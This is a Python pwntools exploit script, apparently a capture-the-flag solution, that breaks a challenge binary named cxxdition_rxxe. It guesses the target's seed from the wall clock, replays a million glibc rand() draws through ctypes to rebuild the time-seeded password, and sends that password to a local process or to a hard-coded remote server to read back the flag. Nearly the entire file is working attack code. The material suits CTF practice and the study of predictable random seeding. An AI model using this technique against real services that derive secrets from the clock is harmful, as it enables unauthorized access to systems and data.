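#!/usr/bin/python3
"""Recover the time-seeded password of ./cxxdition_rxxe and read back the flag.

The target's "password" is reproduced here from glibc ``rand()`` after
``srand()`` with an epoch-second seed: one million ``rand()`` results are
XOR-folded into four 32-bit words (see ``derive_passwd``). Because the seed
is just the wall clock, anyone who knows roughly *when* the target seeds can
recompute the password -- which is the whole attack. The script drives the
local libc through ctypes to do that, so the local libc must produce the same
``rand()`` sequence as the target's (glibc's generator is implementation
specific; a different libc family would yield a different password).

Run modes (pwntools ``args``): ``GDB=1`` debugs the local binary, ``REMOTE=1``
talks to the challenge server, otherwise a local process is spawned.
"""
import ctypes
import sys
import time

from pwn import *

filename = "./cxxdition_rxxe"
libcname = "/lib/x86_64-linux-gnu/libc.so.6"
host = '116.198.216.209'
port = 23333

# Number of rand() draws the target folds into the password.
ROUNDS = 1000000
# Seconds to wait for the 'Password' prompt / flag before giving up.
RECV_BUDGET = 2

elf = context.binary = ELF(filename)
context.terminal = ['tmux', 'neww']
if libcname:
    libc = ELF(libcname)  # not used below; kept for interactive use

gs = '''
b main
'''


def start():
    """Return a pwntools tube for the selected run mode (GDB / REMOTE / local)."""
    if args.GDB:
        return gdb.debug(elf.path, gdbscript=gs)
    if args.REMOTE:
        return remote(host, port)
    return process(elf.path)


def derive_passwd(lib, seed, rounds=ROUNDS):
    """Reproduce the target's password for ``seed``.

    Calls ``lib.srand(seed)`` and then XOR-folds ``rounds`` successive
    ``lib.rand()`` values into four accumulators (draw ``i`` goes into slot
    ``i % 4``). Returns the four accumulators as a list of ints.

    ``srand``/``rand`` are process-global state inside ``lib``; do not
    interleave other users of that library between seeding and folding.
    """
    words = [0, 0, 0, 0]
    lib.srand(seed)
    rand = lib.rand  # hoist the ctypes attribute lookup out of the hot loop
    for i in range(rounds):
        words[i % 4] ^= rand()
    return words


def build_payload(words):
    """Pack the password words with p32 (endianness follows ``context``)."""
    return b''.join(p32(w) for w in words)


lib_func = ctypes.CDLL(libcname)

# Seed guess: the target seeds from its own clock, and the precompute below
# takes a noticeable fraction of a second, so aim one second ahead of "now".
# This is a single guess -- clock skew between this host and the target, or a
# slower precompute (see the timing printed below), will make it miss; the
# script then simply times out and exits 1.
seed = int(time.time() + 1)
s = time.time()
passwd = derive_passwd(lib_func, seed)
e = time.time()
print(e - s)  # how long the precompute took; compare against the +1 offset above

payload = build_payload(passwd)

p = start()
start_time = time.time()
try:
    while time.time() - start_time < RECV_BUDGET:
        x = p.recvline(timeout=0.1)  # b'' when nothing arrived in time
        if b'flag{' in x:
            print(x)
            sys.exit(0)
        if b'Password' in x:
            p.send(payload)
        # An earlier variant also watched for b"I'm tired. Take a nap!" and
        # sent payload*10 on the prompt; recorded here only as a note.
except EOFError:
    # Remote closed the connection before a flag was seen (e.g. wrong seed guess).
    pass
sys.exit(1)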